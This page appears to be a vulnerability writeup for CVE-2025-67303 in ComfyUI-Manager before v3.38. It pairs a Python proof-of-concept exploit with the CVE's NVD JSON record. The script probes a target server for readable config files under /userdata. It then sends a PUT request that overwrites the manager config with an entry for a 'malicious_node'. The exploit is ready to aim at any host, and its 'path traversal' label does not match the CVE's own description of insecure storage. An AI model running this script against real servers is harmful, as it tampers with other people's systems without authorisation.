CVE-2025-67303

# CVE-2025-67303 PoC - ComfyUI-Manager Path Traversal # Target: ComfyUI-Manager < v3.38 # This PoC demonstrates accessing config files via web interface import requests import sys TARGET_URL = "http://target-server:8181" COMFYUI_MANAGER_PATH = "/userdata" # Insecure storage path def check_vulnerability(): """Check if target is vulnerable to CVE-2025-67303""" # Try to access the manager's config directory paths_to_check = [ f"{COMFYUI_MANAGER_PATH}/config.json", f"{COMFYUI_MANAGER_PATH}/manager_config.json", f"{COMFYUI_MANAGER_PATH}/custom-node-list.json" ] vulnerable = False for path in paths_to_check: try: response = requests.get(f"{TARGET_URL}{path}", timeout=10) if response.status_code == 200: print(f"[+] Found accessible file: {path}") print(f"[+] Content preview: {response.text[:200]}...") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {path}: {e}") return vulnerable def exploit_config_manipulation(): """Attempt to modify configuration via PUT request""" malicious_config = '{"custom_nodes": ["malicious_node"], "enabled": true}' try: response = requests.put( f"{TARGET_URL}{COMFYUI_MANAGER_PATH}/manager_config.json", data=malicious_config, headers={"Content-Type": "application/json"}, timeout=10 ) if response.status_code in [200, 201, 204]: print("[+] Successfully modified configuration!") return True except requests.exceptions.RequestException: pass return False if __name__ == "__main__": print("CVE-2025-67303 PoC - ComfyUI-Manager < v3.38") print("=" * 50) if check_vulnerability(): print("\n[!] Target is VULNERABLE to CVE-2025-67303") print("[*] Attempting config manipulation...") exploit_config_manipulation() else: print("\n[-] Target appears to be patched or not accessible")

{"cve": {"id": "CVE-2025-67303", "sourceIdentifier": "[email protected]", "published": "2026-01-05T16:15:42.977", "lastModified": "2026-01-30T01:31:37.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in ComfyUI-Manager prior to version 3.38 allowed remote attackers to potentially manipulate its configuration and critical data. This was due to the application storing its files in an insufficiently protected location that was accessible via the web interface"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-420"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.38", "matchCriteriaId": "A2BEDC7B-32BB-4C47-81B5-4EC4357B3E36"}]}]}], "references": [{"url": "https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26", "source": "[email protected]", "tags": ["Patch"]}]}}